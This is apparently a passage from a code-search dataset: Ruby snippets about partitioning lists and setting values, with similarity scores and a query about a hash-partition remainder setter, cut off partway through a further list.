"def bins_with_partition(partition_name)\n @list.select { |bin| bin.has_partition?(partition_name) }\n end",
"def list_values(bn, lists)\n raise \"no list\" unless lists.has_key?(bn)\n first, rest = lists[bn][RDF.first], lists[bn][RDF.rest]\n (rest == RDF.nil ? [] : list_values(rest, lists)).unshift(first)\n rescue\n lists.delete(bn)\n raise $!\n end",
"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def variants_multiply_properties(list)\n return if list.empty?\n keys = list.first.keys\n raise \"Must have same properties\" unless list.collect { |h| h.keys }.uniq.length == keys.length\n raise \"Must have unique list\" unless list.uniq.length == list.length\n self.variants = self.variants.collect do |vd|\n list.collect do |h|\n v = vd.dup\n if num = keys.delete('supplier_num')\n v.supplier_num = num\n elsif post = keys.delete('postfix')\n v.supplier_num += post\n else\n v.supplier_num += keys.collect { |k| \"-#{h[k]}\" }.join\n end\n v.properties = v.properties.merge(h)\n v\n end\n end.flatten\n end",
"def update!(**args)\n @per_partition_bytes = args[:per_partition_bytes] if args.key?(:per_partition_bytes)\n @period = args[:period] if args.key?(:period)\n end",
"def partition\n return enum_for(:partition) if not block_given?\n a,b = super\n [self.class.new(a), self.class.new(b)].freeze\n end",
"def crop!(crop_partitions, crop_sites_per_partition)\n @list = Hash[@list.first(crop_partitions)]\n @list = Hash[@list.map do |partition_name, partition|\n [partition_name, partition.crop(crop_sites_per_partition - Random.rand(0..2))]\n end]\n end",
"def value_list_params\n params.require(:value_list).permit(:name, :value_items)\n end",
"def split_partitions\n partition_names = @list.map { |bin| bin.partition_names }.flatten\n partition_names.select { |name| partition_names.index(name) != partition_names.rindex(name) }.uniq\n end",
"def compact!\n @list.delete_if {|partition_name, partition| partition.sites.size == 0}\n end",
"def partition(linked_list, x)\n pre_list = LinkedList.new\n equal_list = LinkedList.new\n post_list = LinkedList.new\n\n linked_list.each do |node|\n if node.val < x\n pre_list.append(nil,node.val)\n elsif node.val == x\n equal_list.append(nil,x)\n else\n post_list.append(nil,node.val)\n end\n end\n\n equal_list.each do |node|\n pre_list.append(nil, node.val)\n end\n\n post_list.each do |node|\n pre_list.append(nil, node.val)\n end\n\n pre_list.to_s\nend",
"def original_scheduling_initial!(partitions)\n # Phase 1: Sort partitions by sites.size\n partitions.sort_by_sites!\n\n # Phase 2: Initial filling\n bin_assigner = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_assigner].total_sites + partitions.first.sites.size <= @sites_lower_bound\n @list[bin_assigner].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_assigner].total_sites == @sites_lower_bound\n full_bins += 1\n @sites_lower_bound -= 1 if full_bins == @list.size - @sites_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_assigner = (bin_assigner + 1) % @list.size\n end\n partitions\n end",
"def cluster_ids=(ids)\n ids.each do |cluster_id|\n cluster = Cluster.find cluster_id\n self.nodes << cluster.nodes\n end\n end",
"def partition(list, left, right)\n pivot = list[right]\n previous_left = left-1\n left.upto(right-1) { |value|\n previous_left = previous_left + 1 if list[value] <= pivot\n list[previous_left], list[value] = list[value], list[previous_left] if list[value] <= pivot\n }\n list[previous_left+1], list[right] = list[right], list[previous_left+1]\n return previous_left + 1\nend",
"def partition list, x\n # TODO implement size property in list class\n cur = list.head\n size = 0\n while cur != nil\n size += 1\n cur = cur.nxt\n end\n\n cur = list.head\n i = 0\n while i < size\n mv = cur\n list.remove(i)\n if mv.node < x\n list.insert(mv.node, 0)\n else\n list.insert(mv.node, size - 1)\n end\n cur = cur.nxt\n i += 1\n end\n\n return list\nend",
"def set(enumerable); end",
"def select_values values\n return unless values\n values.each do |val|\n row = @list.index val\n add_row_selection_interval row, row unless row.nil?\n end\n end",
"def _refresh_set_values(h)\n @values = h\n end",
"def _refresh_set_values(h)\n @values = h\n end",
"def embed_property_value_list( property_value_list )\n count = 1 \n property_value_list.each do |property_value_pair|\n PropertyValue.create(:item_id => self.id, \n :property_id => property_value_pair[:property_id],\n :value_id => property_value_pair[:value_id],\n :position => count)\n count += 1 \n end\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def partitionList list, x\n prev = list.head\n node = prev.next\n\n while node\n if (node.val < x)\n prev.next = node.next\n node.next = list.head\n list.head = node\n node = prev.next\n else\n prev = prev.next\n node = prev ? prev.next : nil\n end\n end\nend",
"def values=(collection)\n @values = collection\n end",
"def set v\n if multiple?\n raise \"wrong number of values (#{v.length} for #{@min_count}..#{@max_count})\" if (v.length < min_count) || (max_count != :unlimited && v.length > max_count)\n @value = v.map {|w| single_value w }\n else\n @value = single_value v\n end\n self\n end",
"def set(index, val)\n \n end",
"def initialize_list\n Array(value.value).each_with_index do |val, index|\n ordered_list.insert_proxy_for_at(index, calling_mapper.for(Property.new(value.subject, :member_id, val, value.adapter, value.resource)).result.value)\n end\n end",
"def set(list, list_size, filler_char, highlight, box)\n self.setContents(list, list_size)\n self.setFillerChar(filler_char)\n self.setHighlight(highlight)\n self.setBox(box)\n end",
"def values=(value)\n @values = value\n end",
"def values=(value)\n @values = value\n end",
"def values=(value)\n @values = value\n end",
"def add_tree!(tree, compute = true)\n @list.each_value do |partition|\n partition.add_tree!(tree, compute)\n end\n self\n end",
"def adapted_scheduling_initial!(partitions)\n bin_index = 0\n full_bins = 0\n partitions.size.times do\n if @list[bin_index].size + partitions.first.size <= @operations_lower_bound\n @list[bin_index].add!([partitions.first])\n partitions.drop!(1)\n\n # Edge case handling for perfect fit\n if @list[bin_index].size == @operations_lower_bound\n full_bins += 1\n @operations_lower_bound -= 1 if full_bins == @list.size - @operations_rounding_adjustment\n end\n\n else\n break\n end\n\n bin_index = (bin_index + 1) % @list.size\n end\n @list = @list.sort\n\n partitions\n end",
"def set\n @items.each do |d|\n eval d.rubify\n end\n end",
"def update_for=(list)\n build_package_association_assignment(:update_for_items,list)\n end",
"def refine_permitted_params(param_list)\n res = param_list.dup\n\n ms_keys = res.select { |a| columns_hash[a.to_s]&.array }\n ms_keys.each do |k|\n res.delete(k)\n res << { k => [] }\n end\n\n res\n end",
"def setPartitionType(settings)\n settings = deep_copy(settings)\n tm = Storage.GetTargetMap\n settings = Builtins.maplist(settings) do |d|\n if Ops.get_symbol(d, \"type\", :x) == :CT_DISK\n mp = Ops.get_integer(\n tm,\n [Ops.get_string(d, \"device\", \"xxx\"), \"max_primary\"],\n 0\n )\n if Ops.greater_than(mp, 0)\n Ops.set(\n d,\n \"partitions\",\n Builtins.maplist(Ops.get_list(d, \"partitions\", [])) do |pe|\n if Builtins.haskey(pe, \"partition_nr\") &&\n !Builtins.haskey(pe, \"partition_type\") &&\n Ops.less_or_equal(\n Ops.get_integer(pe, \"partition_nr\", -1),\n mp\n )\n Ops.set(pe, \"partition_type\", \"primary\")\n end\n deep_copy(pe)\n end\n )\n end\n end\n deep_copy(d)\n end\n Builtins.y2milestone(\"after setPartitionType = %1\", settings)\n deep_copy(settings)\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n self.class.new.import(result[0]),\n self.class.new.import(result[1]),\n ]\n end",
"def slice_fill!(remaining_partitions)\n # Total number of sites that need to be distributed\n total_sites_remaining = remaining_partitions.total_sites\n total_free_space = self.total_free_space\n\n # Fill each bin starting with the least filled\n self.each do |bin|\n\n # How many sites need to go into the current bin\n number_of_sites = ((@operations_lower_bound - bin.size).to_f / total_free_space * total_sites_remaining).ceil # FIXME: It's probably better to round down and save overflow in last bin\n\n # Fill \"number_of_sites\" sites taken from \"remaining_partitions\" into the bin. The rest stays in \"remaining_partitions\"\n dropped_partitions = remaining_partitions.drop_sites!(number_of_sites)\n bin.add!(dropped_partitions)\n end\n end",
"def set_values\n\t\tself.avg_price = set_avg_price\n\t\tself.avg_bath = set_avg_bath\n\t\tself.avg_bed = set_avg_bed\n\t\tself.avg_size = set_avg_size\n\tend",
"def each(*args, &block)\n @partition.each(*args, &block)\n end",
"def add_partition_to_node( tp, node )\n\n @nodes_lists_replicas[node][tp] = ''\n @partitions_lists[tp]['replicas'] ||= {}\n @partitions_lists[tp]['replicas'][node] = ''\n end",
"def store_values\n self.parent.write_attribute(self.field_name, self.ids)\n end",
"def set_lower_bound!(partitions)\n @operations_lower_bound = (partitions.op_optimized_size.to_f / @list.size).ceil\n @operations_rounding_adjustment = @operations_lower_bound * @list.size - partitions.op_optimized_size\n @sites_lower_bound = (partitions.total_sites.to_f / @list.size).ceil\n @sites_rounding_adjustment = @sites_lower_bound * @list.size - partitions.total_sites\n end",
"def _save_set_values(h)\n @values = h\n end",
"def _save_set_values(h)\n @values = h\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end",
"def set_Part(value)\n set_input(\"Part\", value)\n end"
] |
[
"0.5762416",
"0.5667353",
"0.566424",
"0.5646707",
"0.5622374",
"0.5546669",
"0.5455992",
"0.5372267",
"0.5271329",
"0.525934",
"0.5230752",
"0.51615244",
"0.51250994",
"0.50517833",
"0.505155",
"0.5036472",
"0.5034609",
"0.5030784",
"0.50031763",
"0.50018364",
"0.49964488",
"0.4996121",
"0.49835724",
"0.4981822",
"0.49727532",
"0.49354285",
"0.4921034",
"0.48872793",
"0.48590082",
"0.48589292",
"0.48586738",
"0.48306066",
"0.48268396",
"0.4816385",
"0.48098156",
"0.48087654",
"0.479774",
"0.47748336",
"0.47641897",
"0.47536764",
"0.4750542",
"0.47248584",
"0.47215983",
"0.47181734",
"0.47179073",
"0.47126132",
"0.47093338",
"0.46944132",
"0.46931237",
"0.46912736",
"0.4685708",
"0.46709523",
"0.46667793",
"0.46619633",
"0.46615696",
"0.46514145",
"0.46514145",
"0.46359625",
"0.4632887",
"0.4607363",
"0.45972767",
"0.4593251",
"0.45901173",
"0.4589061",
"0.45881072",
"0.4584153",
"0.4584153",
"0.4584153",
"0.45831496",
"0.4565549",
"0.4560663",
"0.45603874",
"0.45588526",
"0.45574",
"0.45524332",
"0.45385197",
"0.45317578",
"0.45309642",
"0.45264894",
"0.4511187",
"0.45009536",
"0.4500661",
"0.4500661",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396",
"0.44979396"
] |
0.0
|
-1
|
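For list partitioning, the values_in setter above routes explicit key values to a partition. A minimal usage sketch, assuming a hypothetical ListPartition wrapper; only the values_in method shape comes from the record above:

class ListPartition
  attr_reader :in_values

  # Values assigned to this partition (mirrors def values_in(*v) above).
  def values_in(*v)
    @in_values = v
  end
end

regions = ListPartition.new
regions.values_in('us', 'ca', 'mx') # rows with these keys land in this partition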
Assumes hash partitioning, sets the modulus for this partition.
|
def modulus(v)
@modulus = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def modulo(p0) end",
"def modulus\n distance_to(origin)\n end",
"def rehash(oldhash, size)\n (oldhash + 1) % size\n end",
"def divmod(p0) end",
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def modulo(other)\n self % other\n end",
"def saveThePrisoner(n, m, s)\n mod = (m % n == 0) ? n : (m % n)\n return ((mod + s -1) % n == 0) ? n : (mod + s -1) % n\n\nend",
"def divmod(val); end",
"def modulo(other)\n Modulo.new(self, other)\n end",
"def remainder(p0) end",
"def saveThePrisoner(n, m, s)\n res = ((m - 1) + s) % n\n res == 0 ? n : res \nend",
"def modulus(d, e)\n puts \"MODULUS #{d} % #{e}\"\n return d % e\nend",
"def mod(first_number, second_number)\n first_number % second_number\nend",
"def modulus\n\tputs (5%3)\n\tputs ( -5 % 3)\n\tputs (5 % 3)\n\tputs (-5 % -3)\n\nend",
"def modulo(arg0)\n end",
"def modulo(arg0)\n end",
"def hash_values\n [@modulus, @remainder]\n end",
"def my_modulo(dividend, divisor)\r\n # your code goes here\r\n # use of modulo operator\r\n\r\n dividend % divisor\r\nend",
"def initialize\n #Public key is @e, @n\n #Private key is @d, @n\n p = OpenSSL::BN::generate_prime(Bits)\n p = p.to_i\n q = OpenSSL::BN::generate_prime(Bits)\n q = q.to_i\n @n = p * q\n et = (p-1) * (q-1)\n @e = 3\n @d = modinv(@e, et)\n end",
"def modpow( base, exponent, modulus )\n result = 1\n while exponent > 0\n result = ( base * result ) % modulus unless ( ! exponent.bit_set? 0 )\n base = ( base * base ) % modulus\n exponent >>= 1\n end\n result\n end",
"def modpow( base, exponent, modulus )\n result = 1\n while exponent > 0\n result = ( base * result ) % modulus unless ( ! exponent.bit_set? 0 )\n base = ( base * base ) % modulus\n exponent >>= 1\n end\n result\n end",
"def mod(n, m)\n return ((n % m) + m) % m\nend",
"def remainder(val); end",
"def mod11(number); end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
"def hashfunction(key, size)\n #key.hash % size\n key % size\n end",
"def remainder(v)\n @remainder = v\n end",
"def modulo_of(fraction); end",
"def divmod(arg0)\n end",
"def divmod(arg0)\n end",
"def rank=(m)\n @rank = m % (1 << size)\n end",
"def rank=(m)\n @rank = m % factorial(size)\n end",
"def modulo(y)\n mod(y, ZERO)\n end",
"def update!(**args)\n @partition_key = args[:partition_key] if args.key?(:partition_key)\n end",
"def mod(x, y)\n raise NotImplementedError\n end",
"def hash\r\n a = 0\r\n @id.each_byte {|c| a += c.to_i}\r\n (a + @paired.to_i) * HASH_PRIME\r\n end",
"def modular_function\n num_1 % num_2\n return num_1 % num_2\nend",
"def update!(**args)\n @partition_count = args[:partition_count] if args.key?(:partition_count)\n end",
"def mersenne_prime(num)\nend",
"def calculate_random_partitioner_token(key)\n number = Digest::MD5.hexdigest(key).to_i(16)\n\n if number >= (2**127)\n # perform two's complement, basically this takes the absolute value of the number as\n # if it were a 128-bit signed number. Equivalent to Java BigInteger.abs() operation.\n result = (number ^ (2**128)-1) + 1\n else\n # we're good\n result = number\n end\n\n result\n end",
"def position(x) #x will be the Hashable object\r\n return x.hashvalue % @size\r\n end",
"def mod(num1, num2)\n num2.to_f % num1.to_f;\nend",
"def modulo(dividend, divisor)\n puts \"#{dividend} % #{divisor} = #{dividend.modulo(divisor)}\\n\"\nend",
"def secret f\n f.mod_exp(self.x, self.p)\n end",
"def is_divisible_using_hashing(arr, k)\n n = arr.length\n hsh = {}\n # collect reminders and their occurences\n for i in 0...n\n if hsh[arr[i] % k]\n hsh[arr[i] % k] += 1\n else\n hsh[arr[i] % k] = 1 \n end \n end\n\n # traverse array again to check reminders with following possiblities\n # 1. if reminder is 0, then its occurence must be > 1\n # 2. if reminder divides k in two halves, then its occurence must be > 1\n # 3. if reminder occurence is same as k - reminder occurence\n\n for i in 0...n\n rem = arr[i] % k\n if rem * 2 == k || rem == 0\n if hsh[rem] == 1\n return false\n end \n else\n if hsh[rem] != hsh[k-rem]\n return false\n end \n end \n end \n true\nend",
"def mod(interpreter)\n stack = interpreter.stack\n a = stack.pop\n b = stack.pop\n stack.push(b%a) if a && b\n end",
"def changepartition(partition, filename)\n\tbaseaddress = PARTITIONS['boot'][START]\t\n\tsize = partition[SIZE]\n\tpartdata = Flashimage.read(filename)\n\tlength = partdata.size\n\tlast = partition[SIZE]\n\traise('Input file too large.') if length + 12 > last\n\tcrc32 = Zlib.crc32(partdata)\n\tpartdata[length ... last - 12] = \"\\xff\" * (last - length - 12)\n\tpartdata[last - 12 ... last] = [length, 0x12345678, crc32].pack('V3')\n\tfilename = \"#{File.dirname(FLASHIMAGE)}/#{partition[FILE]}\"\n\tFlashimage.write(partdata, filename)\nend",
"def inv_mod x,n\n d,r,s = gcd2 x,n\n if d==1\n r % n\n else\n 0\n end\nend",
"def partition_for!(key)\n if leader_available?\n # Use the configured partitioner\n partition_id = partitioner.call(key, available_partitions.count, partitions.count)\n partition!(partition_id)\n else\n error_code.raise\n end\n end",
"def prime_data(position:, value:)\n @intcode[position] = value\n end",
"def partition(ia, left, h)\n piv = ia[h] #choose the pivot as the furthest value\n i = left - 1 #set i to the index of the lowest value\n temp = 0 #temporary swapping variable\n\n for j in left..(h-1) #for j goes from low to high index..\n if(ia[j] < piv) #if the current value that we are looking at is les than the pivot...\n i += 1 #add one to the lowest position counter...\n\n #swap those two values\n ia[i],ia[j] = ia[j],ia[i]\n\tend\n end\n #swap so partition is in the middle\n ia[i+1],ia[h] = ia[h],ia[i+1]\n\n return (i+1)\nend",
"def div_h_p_nr(a,b)\n p = 0\n\n @bits.times do\n if p < 0\n # (i-a) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-a) p=p+b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p += b\n else\n # (i-b) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-b) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n# Tests pass if the following is uncommented\n# # (iv) restore p\n# p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n end\n # FIXME - need a test case that exercises this last step\n if p < 0\n p += b\n end\n [lo(a),lo(p)]\n end",
"def mod\n x, y = stack.pop(2)\n push x % y\n end",
"def key_for(params, id, length = 32)\n pset = {\n :iters => params.iterations,\n :salt => params.salt\n }\n @keys[pset] = { :master => master_key_for(params) } unless @keys[pset]\n return @keys[pset][id] if @keys[pset][id]\n @keys[pset][id] = hkdf_expand(@keys[pset][:master], \"1:#{id}\", length)\n end",
"def inverse_modulo(n)\n\t\treturn nil unless self.gcd(n) == 1\n\t\t(n.extended_gcd(self).last) % n\n\tend",
"def kidmod10(base); end",
"def [](num) #<== maybe requires hash\n # num_hash = num.hash\n # @store[num_hash % num_buckets]\n @store[num % num_buckets]\n end",
"def prime_factorization(num)\n \nend",
"def prime_factorization(num)\n \nend",
"def prime_factorization(num)\n \nend",
"def secret f\n f.mod_exp(self.x, self.p)\n end",
"def partition(a,p,r)\n i = p-1\n key = a[r]\n for j in p..r-1\n if(a[j]<=key)\n i = i + 1\n temp = a[i]\n a[i] = a[j]\n a[j] = temp\n end\n end\n temp = a[i+1]\n a[i+1] = a[r]\n a[r] = temp\n return i+1\nend",
"def mod_hash(hash)\n modicado = {}\n hash.each { |plato, valor| modicado[plato] = valor.to_f * 1.19 }\n modicado\nend",
"def set_mod_list(k, s)\n arr = []\n k.times do |i|\n arr.push(s.count { |a| a % k == i })\n end\n arr\nend",
"def index(key, size)\n i = key.sum % size \n end",
"def mod(signal)\n self.class.new(self, signal) { |a, b| a % b }\n end",
"def partition_private(leftmost_index, rightmost_index)\n i = leftmost_index + 1\n pivot = self[leftmost_index] # the pivot can be chosen a number of different ways\n j = i\n while j <= rightmost_index\n # if the value is less than the pivot value, go search\n if self[j] < pivot\n self[i], self[j] = self[j], self[i]\n i += 1\n end\n j += 1\n end\n # puts the pivot into the correctly sorted area\n self[leftmost_index], self[i - 1] = self[i - 1], self[leftmost_index]\n i - 1\n end",
"def hash_this(word)\n\t\tdigest = Digest::MD5.hexdigest(word) # get the hex version of the MD5 for the specified string\n\t\tdigest[@offset, @digits].to_i(16) % @max_value # offset it using the initial seed value and get a subset of the md5. then modulo it to get the bit array location\n\tend",
"def hashit\n n = 0\t \n (\"A\"..\"Z\").each do |x|\n @rotor_hash[x] = @rotor_array[n]\n n += 1\n end \n return @rotor_hash\n end",
"def rehash() end",
"def prime_factorization(num)\nend",
"def sign_block(key_private, timestamp)\r\n # RSA Encryption (Formula: C = M^d mod n)\r\n timestamp = timestamp.to_i % key_private[1].to_i\r\n signature = timestamp.to_bn.mod_exp(key_private[0],key_private[1])\r\n return signature\r\nend",
"def replace_weight(_test_digits)\n return modulus_weight\n end",
"def initialize(exponent_hex_string, modulus_hex_string)\n @e = BigNum.from_hex exponent_hex_string\n @n = BigNum.from_hex modulus_hex_string\n @size = (@n.to_hex.length + 1) / 2\n @chunk_cache = {}\n end",
"def __remainder=(v) # only keep relevant bits of the remainder\n if v != 0\n num_bits = self.class.type.size * 8\n num_used_bits = self.class.map.value.collect { |v, _, _| v }.select { |v| v > 0 }.sum(:+)\n if num_used_bits < num_bits\n v &= ((( 1 << (num_bits - num_used_bits)) - 1) << num_used_bits)\n else\n v = 0\n end\n end\n @__remainder = v\n end",
"def func_mod(args)\n p1 = _eval(car(args))\n p2 = _eval(car(cdr(args)))\n\n if p1.type != LObject::OBJ_INTEGER or p2.type != LObject::OBJ_INTEGER\n if @lint\n Error.warn(\"warning: modulo with a non integer operand\")\n end\n return @o_man.nil\n end\n\n p3 = @o_man.new_object(LObject::OBJ_INTEGER)\n if p2.value.i == 0\n if @lint\n Error.warn(\"warning: modulo by zero\")\n end\n p3.value.i = 0\n else\n p3.value.i = p1.value.i % p2.value.i\n end\n\n return p3\n end",
"def hash99999\n return nil unless @parts\n\n k = construct\n return nil unless k\n\n Digest::SHA256.hexdigest(construct[0..-6] << '99999')[0..23]\n end",
"def set_part\n @part = Part.find(params[:id])\n # authorize(@part)\n end",
"def index(key, size) #take the asscii value % size to come up with index\n total = 0\n key.each_byte do |c|\n total = c + total\n end\n total % size\n\n end",
"def select_using_hash(chapter,probs,year,semester,student_id)\n # year = 2014, etc.; semester = \"s\" or \"f\"\n chapter = chapter.to_s\n year = year.to_i\n semester = semester.to_s\n student_id = student_id.to_s\n # figure out an integer for the semester, counting from spring 2014 = 0\n s = (year-2014)*2;\n if semester==\"f\" then s=s+1 end\n x = student_id+\",\"+chapter+\",\"+probs.join(\":\")\n hash = md5_hash_hex(x); # 32 hex digits\n hex4 = hash.to_s[-4..-1]\n k = hex4.to_i(16) # convert hex string to fixnum\n k = k+s; # if a student is repeating the course, cycle through the problems, don't assign same one\n n = probs.length;\n return k%n;\nend",
"def update!(**args)\n @per_partition_bytes = args[:per_partition_bytes] if args.key?(:per_partition_bytes)\n @period = args[:period] if args.key?(:period)\n end",
"def hash\n num = @high << 64\n num |= @low\n num.hash\n end",
"def partition(cluster_hash)\n data = {}\n h1 = {}\n cluster_hash.sort.to_h.each { |_num2, h2|\n h2.each_key{ |k|\n h1[k] = []\n cluster_hash.sort.to_h.each { |num3, h3|\n if h1[k].map {|e| e['value']}.include?(h3[k])\n num = (h1[k].select { |e| e['value'] == h3[k] }).first['num']\n h1[k].delete_if { |e| e['value'] == h3[k] }\n h1[k] += [{ 'num' => num + num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num + num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n else\n h1[k] += [{ 'num' => num3, 'value' => h3[k], 'cell' => \"#{G5K.nodeset(num3)}: #{h3[k]}\", 'sort' => \"#{h3[k]}\"}]\n end\n }\n h1[k].first['cell'] = h1[k].first['cell'].split(': ')[1] if h1[k].count == 1\n data[k] = h1[k].sort_by{ |e| e['num'].sort[0] }\n }\n }\n data\nend",
"def increment_bucket(bucket)\n (bucket + 1) % table.length\n end",
"def partition(partition_key)\n state_depth_must_be(States::RELATION)\n if @current_relation.partitions.include?(partition_key)\n raise \"duplicate partition key #{partition_key}\"\n end\n @current_relation.partitions << partition_key\n end",
"def rotate!\n @num_rotations = (@num_rotations+1) % NUM_SIDES\n end",
"def index(key, size)\n #true_index = hash(key) % k\n code = 0\n key.split(%r{\\s*}).each do |letter|\n code += letter.ord \n end\n puts code\n return code % size\n\n end",
"def legendre(n, modulus)\n fail ArgumentError, 'Composite modulus' unless modulus.prime?\n return 0 if n.zero?\n factor(n).map { |p, e| prime_legendre p**e, modulus }.inject :*\n end",
"def gen_key\n # get 2 random primes\n p, q = Prime.each.take_while {|x| x <= KEY_SPACE}.sample(2)\n # special easy case of Euler's totient function\n phi = (p-1)*(q-1)\n # calculate modulus, public key, and private key\n n = p*q\n e = get_public(phi)\n d = get_private(phi, e)\n # print results\n puts \"modulus: #{n}\"\n puts \"public key: #{e}\"\n puts \"private key: #{d}\"\n puts \"(internal information)\"\n puts \"phi: #{phi}\"\n puts \"p,q: #{p},#{q}\"\nend",
"def index(key, size)\n return key.sum % size \n end",
"def calculate_hash(input, prep_hashes)\n result = 0\n input.unpack('U*').each do |x|\n result += prep_hashes.hash(x)\n end\n (result % MOD_VALUE).to_s(HEX)\nend",
"def get_d e\n\t\t@e_public_key = e\n\t\tcurrent_mod_z = nil\n\n\t\tbegin\n\t\t\tcurrent_mod_z = current_mod_z ? (current_mod_z + @z) : @z\n\t\t\t@d_secret_key = (current_mod_z + 1) / @e_public_key\n\t\t\tdivision_mod = (current_mod_z + 1) % @e_public_key\n\t end while not (division_mod == 0 and @e_public_key != @d_secret_key)\n\n\t\t@d_secret_key\n\tend",
"def invmod(e, et)\n g, x = extended_gcd(e, et)\n if g != 1\n raise 'The maths are broken!'\n end\n x % et\nend",
"def invmod(e, et)\n g, x = extended_gcd(e, et)\n if g != 1\n raise 'The maths are broken!'\n end\n x % et\nend",
"def initial_particle_assignment\r\n array = 0.upto(@length - 1).to_a\r\n array = array.shuffle\r\n (0..@length - 1).each do |x|\r\n student = array[x]\r\n @position[student][x % @teams] = 1\r\n end\r\n end",
"def hash\n super ^ number.hash\n end",
"def math_parrot(number1, number2)\n number1 + number2\nend",
"def divisible_by(a, b, k)\n a = k if a < k\n\n x = ((b-a)/k)\n x += 1 if a % k == 0\n\n #n = 0\n #(a..b).each do |i|\n # n += 1 if i % k == 0\n #end\n return x\nend",
"def calculate_hash!\n prefix = PREFIX_NAME_LOOKUP[self.type]\n # add special cases for refs\n self.hash_id = NodeId.sha1(\"#{prefix} #{self.size}\\0#{self.content}\")\n end",
"def partition\n PredicatePartition.new(predicate, operand.left.header, operand.right.header)\n end"
] |
[
"0.6106353",
"0.59064716",
"0.58948857",
"0.5822578",
"0.57684463",
"0.55961597",
"0.55376786",
"0.54671663",
"0.5466879",
"0.54487014",
"0.5404215",
"0.5349049",
"0.53391105",
"0.53174484",
"0.526858",
"0.526858",
"0.5246383",
"0.52278817",
"0.5220499",
"0.5183994",
"0.5183994",
"0.5180358",
"0.51526755",
"0.5139453",
"0.51340914",
"0.51093936",
"0.50954443",
"0.50923145",
"0.5067067",
"0.5067067",
"0.5043158",
"0.5042117",
"0.5041193",
"0.5030048",
"0.5029297",
"0.50278634",
"0.4990163",
"0.49518362",
"0.49357358",
"0.4925539",
"0.49244884",
"0.4923425",
"0.49058154",
"0.4900827",
"0.48946014",
"0.4881916",
"0.48785317",
"0.48780558",
"0.48663908",
"0.48636487",
"0.48508766",
"0.48503044",
"0.484642",
"0.48388407",
"0.4833827",
"0.48282155",
"0.4817667",
"0.48115575",
"0.48115575",
"0.48115575",
"0.48077613",
"0.4792897",
"0.47914767",
"0.47910264",
"0.47885466",
"0.47831967",
"0.47812763",
"0.4779003",
"0.47761685",
"0.47760344",
"0.47749504",
"0.4758439",
"0.47438407",
"0.4742004",
"0.47415036",
"0.47371235",
"0.47233912",
"0.47039622",
"0.4703372",
"0.46992224",
"0.4695534",
"0.46840817",
"0.46682593",
"0.46613884",
"0.46570444",
"0.4655194",
"0.46545666",
"0.46466625",
"0.46430388",
"0.46418992",
"0.46371785",
"0.46284285",
"0.46211243",
"0.46211243",
"0.46180335",
"0.4617875",
"0.46111393",
"0.4607527",
"0.45932907",
"0.45926777"
] |
0.7081045
|
0
|
Assumes hash partitioning; sets the remainder for this partition.
|
def remainder(v)
@remainder = v
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def rehash(oldhash, size)\n (oldhash + 1) % size\n end",
"def set_partition\n @partition = Partition.find(params[:id])\n end",
